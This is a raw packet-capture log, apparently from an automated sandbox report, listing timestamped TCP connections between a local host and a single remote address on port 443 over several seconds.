                                                                                                                                                                        Nov 24, 2024 05:12:44.218985081 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.218998909 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.219006062 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.221836090 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.221883059 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.221961021 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.222104073 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.222121000 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.250319958 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.253279924 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.253348112 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.253376007 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.253402948 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.253464937 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.253504038 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.253519058 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.253530025 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.253535032 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.256076097 CET50038443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.256100893 CET4435003813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.256176949 CET50038443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.256458998 CET50038443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.256469011 CET4435003813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:45.585643053 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:45.586282015 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:45.586306095 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:45.586954117 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:45.586962938 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:45.953089952 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:45.953696966 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:45.953790903 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:45.954194069 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:45.954210043 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.002162933 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.002717972 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.002727032 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.003232956 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.003240108 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.028606892 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.031948090 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.032051086 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.032377005 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.032394886 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.032422066 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.032430887 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.036262989 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.036314011 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.036386013 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.036740065 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.036757946 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.083369970 CET4435003813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.084182978 CET50038443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.084206104 CET4435003813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.084727049 CET50038443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.084736109 CET4435003813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.115235090 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.115744114 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.115765095 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.116164923 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.116173983 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.404915094 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.404973030 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.405087948 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.405138016 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.406940937 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.406980038 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.407004118 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.407360077 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.407480001 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.409998894 CET50040443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.410031080 CET4435004013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.410049915 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.410115004 CET50040443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.410248041 CET50040443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.410271883 CET4435004013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.454317093 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.454350948 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.454425097 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.454436064 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.454665899 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.454665899 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.454679012 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.454893112 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.454941034 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.455010891 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.457446098 CET50041443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.457479954 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.457540989 CET50041443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.457691908 CET50041443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.457707882 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.525172949 CET4435003813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.528568983 CET4435003813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.528680086 CET50038443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.528742075 CET50038443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.528769016 CET4435003813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.528810978 CET50038443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.528821945 CET4435003813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.532830000 CET50042443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.532877922 CET4435004213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.533225060 CET50042443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.533225060 CET50042443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.533273935 CET4435004213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.568414927 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.573510885 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.573560953 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.573565960 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.573620081 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.573682070 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.573708057 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.573723078 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.573729992 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.576792002 CET50043443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.576837063 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:46.576924086 CET50043443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.577078104 CET50043443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:46.577095985 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:47.881741047 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:47.943552971 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.044888020 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.044900894 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.045470953 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.045475960 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.192256927 CET4435004013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.194122076 CET50040443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.194122076 CET50040443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.194139957 CET4435004013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.194158077 CET4435004013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.237783909 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.238276005 CET50041443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.238312006 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.238687992 CET50041443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.238693953 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.290786028 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.291750908 CET50043443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.291774035 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.292208910 CET50043443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.292215109 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.312478065 CET4435004213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.313236952 CET50042443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.313271046 CET4435004213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.313836098 CET50042443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.313843966 CET4435004213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.378957987 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.382369995 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.382458925 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.382477045 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.382508039 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.382566929 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.382608891 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.382623911 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.382635117 CET50039443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.382641077 CET4435003913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.385880947 CET50044443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.385921955 CET4435004413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.385998964 CET50044443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.386145115 CET50044443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.386158943 CET4435004413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.637171030 CET4435004013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.640398979 CET4435004013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.640495062 CET50040443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.640569925 CET50040443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.640597105 CET4435004013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.640613079 CET50040443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.640620947 CET4435004013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.643862963 CET50045443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.643913984 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.643980026 CET50045443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.644148111 CET50045443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.644161940 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.681513071 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.681544065 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.681591034 CET50041443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.681617022 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.681632996 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.681693077 CET50041443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.681760073 CET50041443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.681772947 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.681778908 CET50041443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.681783915 CET4435004113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.685743093 CET50046443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.685784101 CET4435004613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.685836077 CET50046443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.686126947 CET50046443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.686142921 CET4435004613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.782582045 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.782615900 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.782660007 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.782660007 CET50043443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.782702923 CET50043443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.783243895 CET50043443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.783267975 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.783279896 CET50043443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.783287048 CET4435004313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.792714119 CET50047443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.792757988 CET4435004713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.792819977 CET50047443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.793252945 CET50047443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.793267012 CET4435004713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.831852913 CET4435004213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.834913015 CET4435004213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.834975004 CET50042443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.860485077 CET50042443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.860534906 CET4435004213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.864645004 CET50048443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.864681959 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:48.864823103 CET50048443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.864933014 CET50048443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:48.864953041 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.191662073 CET4435004413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.200839996 CET50044443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.200854063 CET4435004413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.201387882 CET50044443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.201394081 CET4435004413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.493285894 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.493988037 CET50045443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.494023085 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.494513035 CET50045443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.494523048 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.540863991 CET4435004613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.541865110 CET50046443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.541884899 CET4435004613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.542367935 CET50046443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.542373896 CET4435004613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.572721004 CET4435004713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.573259115 CET50047443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.573297024 CET4435004713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.573893070 CET50047443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.573899031 CET4435004713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.610738039 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.611300945 CET50048443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.611330986 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.611969948 CET50048443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.611975908 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.645706892 CET4435004413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.645891905 CET4435004413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.645962954 CET50044443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.646102905 CET50044443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.646121025 CET4435004413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.646135092 CET50044443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.646141052 CET4435004413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.649777889 CET50049443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.649825096 CET4435004913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.649903059 CET50049443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.650091887 CET50049443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.650105953 CET4435004913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.946858883 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.949799061 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.949887991 CET50045443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.949912071 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.949973106 CET50045443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.950026989 CET50045443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.950046062 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.950057030 CET50045443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.950063944 CET4435004513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.953278065 CET50050443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.953326941 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.953398943 CET50050443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.953545094 CET50050443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.953557968 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.993854046 CET4435004613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.996926069 CET4435004613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.996997118 CET50046443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.997037888 CET50046443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.997055054 CET4435004613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:50.997071028 CET50046443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:50.997075081 CET4435004613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.000206947 CET50051443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.000248909 CET4435005113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.000323057 CET50051443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.000477076 CET50051443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.000493050 CET4435005113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.015940905 CET4435004713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.016028881 CET4435004713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.016117096 CET50047443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.016370058 CET50047443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.016392946 CET4435004713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.016403913 CET50047443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.016410112 CET4435004713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.019963980 CET50052443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.020009041 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.020104885 CET50052443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.020286083 CET50052443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.020294905 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.044450045 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.047616005 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.047673941 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.047692060 CET50048443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.047734976 CET50048443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.047801971 CET50048443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.047820091 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.047832966 CET50048443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.047838926 CET4435004813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.050910950 CET50053443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.050946951 CET4435005313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:51.051018953 CET50053443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:51.051146984 CET50053443192.168.2.713.107.246.63
